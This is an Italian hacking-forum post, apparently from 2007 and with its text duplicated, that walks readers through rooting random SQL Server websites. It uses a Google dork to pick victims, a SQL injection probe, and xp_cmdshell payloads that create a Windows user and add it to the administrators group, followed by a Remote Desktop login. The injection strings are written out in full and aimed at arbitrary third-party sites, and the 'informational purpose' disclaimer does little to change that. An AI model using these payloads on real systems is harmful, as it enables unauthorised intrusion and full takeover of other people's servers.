- 18 Agosto 2007
- 2.775
- 0
- Miglior risposta
- 0
Salve,oggi ho deciso di scrivere una guida su come ROOTARE (Prendere possesso ed avere accesso cm amministratore) un Server SQL tramite SQL Injection che usa il DBO,servendoci del nostro amico google e delle dork (potete usare anke yahoo o altri motori di ricerca ma le dork sn solo x google LòL)
Premessa :
Se non avete mai sentito lontanamente parlare di una delle seguenti cose chiudete la pagina,la guida non fa per voi :
Root (Rooting e Rootare)
Server SQL
SQL
SQL Injection
Dork
DBO
PS : Non postate messaggi inutili come :
Aiutami dimmi un sito T_T (Ce nè sono quanti nè vuoi x il Web U.U)
Non ce la faccio è troppo difficile (L'avevo detto di uscire dalla pagina >.<)
Mi spieghi il significato delle parole ? (Cerca su google)
Mi da questo errore di connessione (Ci sn le guide in linea >.<)
Bella guida bravo (Questo potete scriverlo ù.ù xD)
Sapete tutto ? (:O non me lo aspettavo xD ske ske)
Allora iniziamo :
Prima di tutto rechiamoci su google e scriviamo
inurl:news.asp?id=
Premiamo invio (Ma va ò.ò)
Prendiamo un sito a caso (Uno degli ultimi tra le pagine in fondo )
N.B. : Se notate bene quando arriverete alla 12^ pagina di google vi darà accesso negato xk google rileva la rikiesta al motore di ricerca come virus o spyware (Vedete di risolvervi il problema perchè non molti siti hanno i "requisiti" )
Allora,prendete un sito qualunque e adesso verificheremo se usa il DBO .
Allora dove c'è scritto (news.asp?id=1(o altri numeri) cancellate 1 e scrivete
convert(int,(select+user));-- )
Così :
news.asp?id=1 diventerà -> news.asp?id=convert(int,(select+user));--
Se vi uscirà un errore come questo :
è fatta.
Allora se l'errore è uscito,usa il DBO.
Adesso dopo news.asp?id=1 scriviamo ;exec%20master..xp_cmdshell 'net user nome_admin pass_admin /add';--
Così :
news.asp?id=1;exec%20master..xp_cmdshell 'net user nome_admin pass_admin /add';--
Al posto di nome_admin mettete un Username a vostro piacimento e al posto di pass_admin mettete una password a vostro piacimento (Ricordatevi però User e password messi ke dopo servono
)
Adesso cancelliamo ;exec%20master..xp_cmdshell 'net user nome_admin pass_admin /add';--
e scriviamo
;exec%20master..xp_cmdshell 'net localgroup administrators nome_admin /add';--
Dove nome_admin sarà il nome messo prima .
Adesso connettiamoci al desktop remoto
(Start - Tutti i programmi - Accessori - Connessione desktop remoto)
Connettiamoci all'IP del server .
Adesso vi chiederà Username e Password,bene usiamo l'Username ke abbiamo messo a "nome_admin" e Password a "pass_admin" .
Adesso siamo dentro e facciamo ciò ke vogliamo
Adesso abbiamo ROOTATO il Server SQL e possiamo fare ciò ke vogliamo ^^
FONTE : ME (HaCk-GaMe)
Guida creata a scopo informativo!
Ho messo la guida qui perchè non sapevo se metterla in guide e tutorial o Web security e attack .
Spostatela voi perfavore :P
Premessa :
Se non avete mai sentito lontanamente parlare di una delle seguenti cose chiudete la pagina,la guida non fa per voi :
Root (Rooting e Rootare)
Server SQL
SQL
SQL Injection
Dork
DBO
PS : Non postate messaggi inutili come :
Aiutami dimmi un sito T_T (Ce nè sono quanti nè vuoi x il Web U.U)
Non ce la faccio è troppo difficile (L'avevo detto di uscire dalla pagina >.<)
Mi spieghi il significato delle parole ? (Cerca su google)
Mi da questo errore di connessione (Ci sn le guide in linea >.<)
Bella guida bravo (Questo potete scriverlo ù.ù xD)
Sapete tutto ? (:O non me lo aspettavo xD ske ske)
Allora iniziamo :
Prima di tutto rechiamoci su google e scriviamo
inurl:news.asp?id=
Premiamo invio (Ma va ò.ò)
Prendiamo un sito a caso (Uno degli ultimi tra le pagine in fondo )
N.B. : Se notate bene quando arriverete alla 12^ pagina di google vi darà accesso negato xk google rileva la rikiesta al motore di ricerca come virus o spyware (Vedete di risolvervi il problema perchè non molti siti hanno i "requisiti" )
Allora,prendete un sito qualunque e adesso verificheremo se usa il DBO .
Allora dove c'è scritto (news.asp?id=1(o altri numeri) cancellate 1 e scrivete
convert(int,(select+user));-- )
Così :
news.asp?id=1 diventerà -> news.asp?id=convert(int,(select+user));--
Se vi uscirà un errore come questo :
è fatta.
Allora se l'errore è uscito,usa il DBO.
Adesso dopo news.asp?id=1 scriviamo ;exec%20master..xp_cmdshell 'net user nome_admin pass_admin /add';--
Così :
news.asp?id=1;exec%20master..xp_cmdshell 'net user nome_admin pass_admin /add';--
Al posto di nome_admin mettete un Username a vostro piacimento e al posto di pass_admin mettete una password a vostro piacimento (Ricordatevi però User e password messi ke dopo servono
)Adesso cancelliamo ;exec%20master..xp_cmdshell 'net user nome_admin pass_admin /add';--
e scriviamo
;exec%20master..xp_cmdshell 'net localgroup administrators nome_admin /add';--
Dove nome_admin sarà il nome messo prima .
Adesso connettiamoci al desktop remoto
(Start - Tutti i programmi - Accessori - Connessione desktop remoto)
Connettiamoci all'IP del server .
Adesso vi chiederà Username e Password,bene usiamo l'Username ke abbiamo messo a "nome_admin" e Password a "pass_admin" .
Adesso siamo dentro e facciamo ciò ke vogliamo
Adesso abbiamo ROOTATO il Server SQL e possiamo fare ciò ke vogliamo ^^
FONTE : ME (HaCk-GaMe)
Guida creata a scopo informativo!
Ho messo la guida qui perchè non sapevo se metterla in guide e tutorial o Web security e attack .
Spostatela voi perfavore :P
Ultima modifica:
